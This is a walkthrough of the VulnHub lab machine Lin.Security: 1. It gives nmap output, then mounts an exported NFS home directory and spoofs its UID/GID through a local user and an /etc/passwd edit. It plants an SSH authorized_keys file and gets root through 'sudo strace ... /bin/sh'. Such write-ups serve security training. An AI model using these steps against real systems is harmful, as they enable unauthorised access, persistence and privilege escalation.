VulnHub — Lin.Security: 1

Lin.Security: 1

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42998/udp6 mountd
| 100005 1,2,3 51373/udp mountd
| 100005 1,2,3 54941/tcp mountd
| 100005 1,2,3 56091/tcp6 mountd
| 100021 1,3,4 39195/tcp6 nlockmgr
| 100021 1,3,4 41981/tcp nlockmgr
| 100021 1,3,4 46553/udp nlockmgr
| 100021 1,3,4 53353/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
33243/tcp open mountd 1–3 (RPC #100005)
37451/tcp open mountd 1–3 (RPC #100005)
41981/tcp open nlockmgr 1–4 (RPC #100021)
54941/tcp open mountd 1–3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 37.139 days (since Thu Aug 29 12:22:51 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 10.0.0.22

Here we found nfs_acl port to be open so let’s check which directory are shared

Here we see that peter directory is shared and we can mount is using mount command

mount 10.0.0.22:/home/peter /tmp/peter 
Note :- make peter directory in tmp before running mount command 

And here we got our peter directory mounted , but we cannot make changes in the directory so we created a new user at our local system with the same UID and GID the mounted peter is having used 👇

useradd peter 
passwd peter 
vim /etc/passwd and edited peter uid and gid to 1001:1005 
then switched to peter and now we can make changes as we are having same uid and gid

didn’t found anything important which can help us in taking ssh connection so we made our own “authorized_keys” and follow below commands

Created a new .ssh directory at /tmp/peter and placed anything.pub in it and renamed it to authorized_keys

Now we can take ssh with the peter user as we had put an authorized key in it , while generating ssh-keygen we got 2 file anything and anything.pub we placed anything.pub to peter .ssh directory and now we will use anything file to get authorized

And now we are connected to ssh using peter’s id

Now let’s look for privilege escalation , sudo -l we get to see that peter is having sudo on /bin/strace , now we will use strace to privilege the user

sudo strace -o /dev/null /bin/sh

And we got root privilege

……………………………………COWABUNGA………………………………